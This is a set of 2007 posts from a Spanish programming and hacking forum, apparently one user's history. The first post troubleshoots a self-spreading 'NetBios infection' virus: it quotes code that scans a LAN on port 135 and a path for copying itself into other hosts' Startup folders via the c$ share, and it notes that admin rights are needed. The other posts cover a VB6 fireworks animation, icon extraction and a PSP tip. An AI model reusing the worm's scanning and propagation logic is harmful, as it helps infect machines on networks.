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Programación / Programación Visual Basic / Re: [Source] NetBios infection Module (ojo que es peligroso!)
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en: 18 Julio 2007, 23:27 pm
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yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi , q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo.. Uaaaa, ya sé porqué no te funciona. (Ha sido un fallo mio). For i = 1 To 254 'Bucle desde X.X.X.1 hasta X.X.X.254 If WS.State <> sckClosed Then WS.CloseSck 'Si el Socket no está cerrado, lo cerramos para evitar errores. DoEvents 'Esperamos... WS.Connect SubNet & "." & i, 135 'Nos conectamos a todos los Hosts de la LAN al puerto 135 TCP (NetBios) [b]Sleep 500[/b] 'Esperamos 1/2 Segundo... If WS.State = sckConnected And i <> MyHost Then 'Si el Hosts es vulnerable y el Host no es MiPC entonces... AliveHosts = AliveHosts & i & "," ' añadimos el octeto del Host en el Array End If 'End If Next i
Es por culpa del Sleep, esa función "duerme" todas las acciones del VB, incluido el IF que hay debajo, por eso en algunos equipos el scanning no funcionara del todo bien. Luego mejoro eso. Otro error... tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio"
Se copia en el perfil All Users, ese perfil está como solo lectura para todos los usuarios y escritura para los Administradores. Si el equipo desde donde lanzas el virus no es administrador de los otros equipos no logrará copiarse. En mi caso utilizo un dominio y lo lancé bajo los credenciales de Administrador del Dominio, por eso a mi me ha funcionado y a ti no. Lo he probado en un grupo de trabajo normal y no funciona xD Este fin de semana me pongo y lo arreglo, ok? Lo siento y saludos!!
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Programación / Programación Visual Basic / Re: [Source] Fireworks++ - Lanza petardos y cohetes en VB6 (MEJORADO!!)
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en: 18 Julio 2007, 16:38 pm
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Ok, pero al postear esto hay k poner la fuente y el autor. Bueno, lo que me faltaba por oir... 1) El source, como bien he dicho en el primer mensaje NO ES MIO, y creo que eso ya ha quedado bastante claro. 2) No puedo citar la fuente original porque ese source me lo pasó un usuario que tengo en el Messenger, ese usuario leyó el primer source de fireworks y me pasó ese, SIN COMENTARIOS, SIN AUTOR Y SIN LA FUENTE!En resumedas cuentas, me han pasado ese source por MSN, no me dijeron de donde lo sacaron ni nada, y los comentarios del source ya estaban quitados! En ningún momento he dicho que lo haya programado yo, simplemente recibí ese source y lo modifiqué para hacer unos efectos nuevos.
Pero vamos... no quiero discutir más contigo, con mensajes como este demuestras tu rabia y odio hacia mi persona (¿envidi quizás?, no se). Paso de tí y voy a dejar esta disputa como otra más de las que ya he tenido contigo...
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Programación / Programación Visual Basic / [Source] Fireworks++ - Lanza petardos y cohetes en VB6 (MEJORADO!!)
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en: 16 Julio 2007, 23:33 pm
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Bueno, aquí el remate final. El Source no es mío, la librería usada para el efecto de "niebla" es sencillamente BRUTAL! 1) Mejorado los efectos de niebla 2) Se han añadido nuevas fórmulas matemáticas para simular petardos 3) Funciona con MouseClick o Random 4) Es wapisimo!! xD Adjunto source y versón compilada. NO EJECUTAR ESTE SOURCE DIRECTAMENTE DESDE EL VB6, TENÉIS QUE COMPILARLOS (CREAR EL EXE) Y EJECUTARLO DESDE AHÍ. SI LO EJECUTAS DESDE EL VB6 NO FUNCIONA BIEN!
Recomiendo, cuando lo ejecutéis, que pulséis sobre la opción NO y luego hagáis click con el raton encima del cuadro. Saludos!!
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Programación / Programación Visual Basic / Re: [ Nuevo aporte ]
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en: 16 Julio 2007, 00:16 am
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a si esta bien buen aporte por cierto ||MadAntrax|| te bajaron de rango? ahora solo dice Moderador y no Moderador Global Nombre: ||MadAntrax|| Título Personalizado: Lab Member Mensajes: 1.130 (1,020 por día) Grupo: CoAdminAparece Moderador porque soy miembro del grupo de Moderadores de este foro. Pero en realidad soy CoAdmin
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Programación / Programación Visual Basic / Re: Problema con iconchanger
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en: 15 Julio 2007, 22:56 pm
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iconchanger falla si...
1) el ejecutable está comprimido o empaquetado (UPX por ejemplo) 2) intentas extraer un icono que no está, está currupto... 3) el ejecutable solo tiene iconos de 16.16, falta el 32x32
revisa esos puntos
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Programación / Programación Visual Basic / [Source] Fireworks - Lanza petardos y cohetes en VB6
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en: 15 Julio 2007, 18:30 pm
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Precioso efecto para añadir en nuestro "About Dialog Box" de cualquier aplicación. Lanza petardos y cohetes de forma aleatória y con colores. Utiliza AlphaBending para simular efecto de "petardo" Ojo, el source no es mio, lo encontré en www.pscode.com como un screensaver, he tenido que modificar bastante el código para dejarlo limpio y listo para usarlo. Sencillamente precioso, no utiliza librerías de DX7 ni DLL''s ni OCX''s Private Type Particle X As Single Y As Single Xv As Single Yv As Single Life As Integer Dead As Boolean Color As Long End Type Private Type FireWork X As Single Y As Single Height As Integer Color As Long Exploded As Boolean P() As Particle End Type Private Type BLENDFUNCTION BlendOp As Byte BlendFlags As Byte SourceConstantAlpha As Byte AlphaFormat As Byte End Type Private Declare Function AlphaBlend Lib "msimg32.dll" (ByVal hDC As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal hDC As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal BLENDFUNCT As Long) As Long Private Declare Sub RtlMoveMemory Lib "kernel32.dll" (Destination As Any, Source As Any, ByVal Length As Long) Private Declare Function SetPixelV Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal crColor As Long) As Long Dim BF As BLENDFUNCTION Dim lBF As Long Dim FW() As FireWork Dim FWCount As Integer Dim RocketSpeed As Integer Private Sub StartFireWork() For i = 0 To FWCount If FW(i).Y = -1 Then GoTo MAKEFIREWORK End If Next i FWCount = FWCount + 1 ReDim Preserve FW(FWCount) i = FWCount MAKEFIREWORK: FW(i).X = Int(Rnd * Me.ScaleWidth) FW(i).Y = Me.ScaleHeight FW(i).Height = Rnd * Me.ScaleHeight FW(i).Color = Int(Rnd * vbWhite) FW(i).Exploded = False ReDim FW(i).P(10) End Sub Private Sub DrawFireWork(tFW As FireWork) Dim DeadCount As Integer Dim RndSpeed As Single Dim RndDeg As Single With tFW If .Exploded Then For i = 0 To UBound(.P) If .P(i).Life > 0 Then .P(i).Life = .P(i).Life - 1 .P(i).X = .P(i).X + .P(i).Xv .P(i).Y = .P(i).Y + .P(i).Yv .P(i).Xv = .P(i).Xv / 1.05 .P(i).Yv = .P(i).Yv / 1.05 + 0.05 PSet (.P(i).X, .P(i).Y), .P(i).Color ElseIf .P(i).Life > -40 Then .P(i).Life = .P(i).Life - 1 .P(i).X = .P(i).X + .P(i).Xv + (0.5 - Rnd) .P(i).Y = .P(i).Y + .P(i).Yv + 0.1 .P(i).Xv = .P(i).Xv / 1.05 .P(i).Yv = .P(i).Yv SetPixelV Me.hDC, .P(i).X, .P(i).Y, .P(i).Color Else .P(i).Dead = True DeadCount = DeadCount + 1 End If Next i If DeadCount >= UBound(.P) Then .Y = -1 End If Else .Y = .Y - RocketSpeed If .Y < .Height Then Dim ExplosionShape As Integer ExplosionShape = Int(Rnd * 6) Select Case ExplosionShape Case 0 ''Regular ReDim .P(Int(Rnd * 100) + 100) For i = 0 To UBound(.P) .P(i).X = .X .P(i).Y = .Y .P(i).Life = Int(Rnd * 20) + 20 RndSpeed = (Rnd * 5) RndDeg = (Rnd * 360) / 57.3 .P(i).Xv = RndSpeed * Cos(RndDeg) .P(i).Yv = RndSpeed * Sin(RndDeg) .P(i).Color = .Color Next i .Exploded = True Case 1 ''Smilely ReDim .P(35) ReDim .P(50) ReDim .P(52) For i = 0 To 35 .P(i).X = .X .P(i).Y = .Y .P(i).Life = 50 .P(i).Xv = 3 * Cos(((360 / 35) * (i + 1)) / 57.3) .P(i).Yv = 3 * Sin(((360 / 35) * (i + 1)) / 57.3) .P(i).Color = .Color Next i For i = 36 To 50 .P(i).X = .X .P(i).Y = .Y .P(i).Life = 50 .P(i).Xv = 2 * Cos(((360 / 35) * i + 15) / 57.3) .P(i).Yv = 2 * Sin(((360 / 35) * i + 15) / 57.3) .P(i).Color = .Color Next i With .P(51) .X = tFW.X .Y = tFW.Y .Life = 50 .Xv = 2 * Cos(-55 / 57.3) .Yv = 2 * Sin(-55 / 57.3) .Color = tFW.Color End With With .P(52) .X = tFW.X .Y = tFW.Y .Life = 50 .Xv = 2 * Cos(-125 / 57.3) .Yv = 2 * Sin(-125 / 57.3) .Color = tFW.Color End With .Exploded = True Case 2 ''Star ReDim .P(50) RndDeg = Int(360 * Rnd) For i = 0 To UBound(.P) .P(i).X = .X .P(i).Y = .Y .P(i).Life = 50 .P(i).Xv = (i * 0.1) * Cos(((360 / 5) * (i + 1) + RndDeg) / 57.3) .P(i).Yv = (i * 0.1) * Sin(((360 / 5) * (i + 1) + RndDeg) / 57.3) .P(i).Color = .Color Next i .Exploded = True Case 3 ''Spiral ReDim .P(50) RndDeg = (360 * Rnd) For i = 0 To UBound(.P) .P(i).X = .X .P(i).Y = .Y .P(i).Life = 50 .P(i).Xv = (i * 0.1) * Cos(((360 / 25) * (i + 1) + RndDeg) / 57.3) .P(i).Yv = (i * 0.1) * Sin(((360 / 25) * (i + 1) + RndDeg) / 57.3) .P(i).Color = .Color Next i .Exploded = True Case 4 ''Regular Random ReDim .P(Int(Rnd * 100) + 100) For i = 0 To UBound(.P) .P(i).X = .X .P(i).Y = .Y .P(i).Life = Int(Rnd * 20) + 20 RndSpeed = (Rnd * 5) RndDeg = (Rnd * 360) / 57.3 .P(i).Xv = RndSpeed * Cos(RndDeg) .P(i).Yv = RndSpeed * Sin(RndDeg) .P(i).Color = Int(Rnd * vbWhite) Next i .Exploded = True End Select Else SetPixelV Me.hDC, .X, .Y, vbWhite End If End If End With End Sub Private Sub Form_KeyPress(KeyAscii As Integer) End End Sub Private Sub Form_Load() Randomize RocketSpeed = Int(Rnd * 4) + 2 FWCount = -1 BF.BlendOp = &H0 BF.BlendFlags = 0 BF.AlphaFormat = 0 End Sub Private Sub Timer1_Timer() For i = 0 To FWCount DrawFireWork FW(i) Next i RtlMoveMemory lBF, BF, 4 AlphaBlend Me.hDC, 0, 0, Me.ScaleWidth, Me.ScaleHeight, Picture1.hDC, 0, 0, Picture1.ScaleWidth, Picture1.ScaleHeight, lBF Me.Refresh End Sub Private Sub Timer2_Timer() StartFireWork BF.SourceConstantAlpha = Int(Rnd * 25) Timer2.Interval = Int(Rnd * 500) Label1.ForeColor = FW(i).Color End Sub
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Media / Juegos y Consolas / Re: ¿que PSP me compro?
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en: 15 Julio 2007, 17:18 pm
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Si no quieres cagarla antes de comprarte una PSP hay un truco para averiguar que versión de firmware te encontrarás SIN ABRIR LA CAJA, solo mirando el código de barras. Yo cuando me la compré era una H (2.50) y me fue de maravilla. Saludos!!
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